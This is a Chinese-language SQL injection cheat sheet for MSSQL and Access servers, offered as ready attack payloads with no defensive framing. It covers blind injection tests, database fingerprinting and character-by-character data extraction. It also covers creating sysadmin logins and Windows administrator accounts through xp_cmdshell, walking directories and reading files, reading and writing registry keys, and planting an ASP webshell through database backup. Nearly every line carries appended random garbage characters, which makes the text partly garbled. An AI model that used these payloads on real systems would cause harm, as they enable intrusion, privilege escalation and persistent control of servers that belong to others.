1.判断是否有注入;and 1=1 ;and 1=2 ^u�C"�df�H
2.初步判断是否是mssql ;and user>0 �wD�B�)&�b
|.y>[+Qb�*
3.注入参数是字符'and [查询条件] and ''=' K���m[]^;6
N
=x]�A�C,
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �c�C b>zI�
+]A+!�8%Z�
5.判断数据库系统 's���=Q�.s
g!p+��rq_f
;and (select count(*) from sysobjects)>0 mssql 6]�.yRN�y"
^�:qpa�5^"
;and (select count(*) from msysobjects)>0 access F"-S~I7�'L
:�5r:I[FFy
!8wZw68"��
D9}d]9�]�$
6.猜数据库 ;and (select Count(*) from [数据库名])>0 DfAi��L��(
bq c��;.4$
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ;~}�-��AI-
�d�8xk&za
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 F�;cI0kP=>
�'�}wG"0��
9.(1)猜字段的ascii值(access) cFR�Sd
}p=
r0~�7v1r�G
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 *raIV��]W3
N5:D8oWWXR
(2)猜字段的ascii值(mssql) 2A�dX)�iF@
v�N{vJlpY�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 =_�#ye}E��
ODM>Z8@W�/
10.测试权限结构(mssql) #�n�U@hOfg
K�?z*3^^X;
bl(B�A�}<�
?3�]h~�(�=
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �X�� !&"&n
yC�9:sQ�'k
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Jm�{A�s*W>
v&t�`5-e-A
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 5O;�/ lX!u
t�9��K�H|y
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Z&�~k]R0y
o�'x_g^ Y�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Mft0D��j/�
[15hci�+�-
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �\GjXsR*b5
htdn$kqG
�
;and 1=(select IS_MEMBER('db_owner'));-- ]1/W8��z%�
p�l1EJ� <�
J@�u!S~&�r
��3L
1lq .
11.添加mssql和系统的帐户 73!�
x@Duh
�S�dE���b[
;exec master.dbo.sp_addlogin username;-- @��&am!+z
;exec master.dbo.sp_password null,username,password;-- a=}�"�>=]7
L!G9�O]�WB
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �uK�"$=v6|
2vk8+LA(6�
;exec master.dbo.xp_cmdshell 'net user username password P:zEx]Y%��
W�#JVU�GYD
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- NO0[`j�y�(
�;6\Ski0=l
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �Ly�CV_6;D
z��m�_h�Lk
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- z9uEOX&2�\
�*�y[~k�WI
o/i5e=�9[y
FZ}C;�yUPD
12.(1)遍历目录 (� .6�t��z
�BT*K�,��p
;create table dirs(paths varchar(100), id int) �epY;1,;�>
Z��"+rg9/p
;insert dirs exec master.dbo.xp_dirtree 'c:\' Jn^��Wzn[q
��>Y*��iy
;and (select top 1 paths from dirs)>0 �!��513rNO
LeRh�(a`=$
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) >P�]I&S-.
w~�F�O:�/�
@Ig,_i\UY:
y(p�:)I�v
(2)遍历目录 !Vod�0j">�
!Z9ikn4�A
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- @v:ILby4�-
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �5k�L#���V
Zq�e�[2()�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �=4�%�WO�I
�qz_�T�cU'
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 "~,(��Xa3x
B� )3S��iU
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 daok�iU+l2
a1��Y���_0
f@V{�}&ZWp
�m`��4�j|5
13.mssql中的存储过程 SUQ}�^g�n]
IE�KX'+�t'
xp_regenumvalues 注册表根键, 子键 #�$
�raUNr
0a;F�X0�S&
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 l�#(g&x6�J
O�KNs (�H�
xp_regread 根键,子键,键值名 U�VuuIW0k�
}�v|[h[cZ�
;exec xp_regread �7�*8nU�q
0i1?S6]d�-
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 b*%WAVt�2T
ok=��E/77`
xp_regwrite 根键,子键, 值名, 值类型, 值 N�7�|�W.(�
_\V{X}ftqa
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �K
�{N;k-�
,Y/�>*�,J
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 a*ix�s'�MJ
�<�z�WQ�[^
xp_regdeletevalue 根键,子键,值名 �� K`mxb}�
N
pIlQaMo4
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 !7Q��.w/|=
!c;p4���B)
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �mgl�'
�d�
xu��C�6EK+
sg�~�/RSJ3
X=7vUb,\gB
14.mssql的backup创建webshell a�\.�?�{/
�)9������P
use model �PzG:��M7�
<L[)P{jn?p
create table cmd(str image); �~�1z8G�>R
w�Zolg~�dg
insert into cmd(str) values (''); �A�7�}|VV
(�>%�� Vj�
backup database model to disk='c:\l.asp'; O4�+w2�'.,
&�]A1 _dy�
�|[�t=.dK%
aQ3vG0�8L>
15.mssql内置函数 +��Gs;3jC^
�� _34YH�5
;and (select @@version)>0 获得Windows的版本号 _��25]>D$�
2QD
B�'xs3
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ;5S7_p2�]j
M%Lw�C/h:,
;and (select user_name())>0 爆当前系统的连接用户 -&^(�����T
Pg}G4L?H;J
;and (select db_name())>0 得到当前连接的数据库 $B�N�+S�D!
z~;�qDf|�I
sm �<kb@g�
�3m9�E2R,�
16.简洁的webshell z�T�zG&B-�
MA QY/s~F�
use model U�*��l��>8
0T�o�
5|�r
create table cmd(str image); �v2<�gkCK^
%�6?�}gc_
insert into cmd(str) values (''); 5q*~h4=�r7
%5w)�}|fw�
backup database model to disk='g:\wwwtest\l.asp';
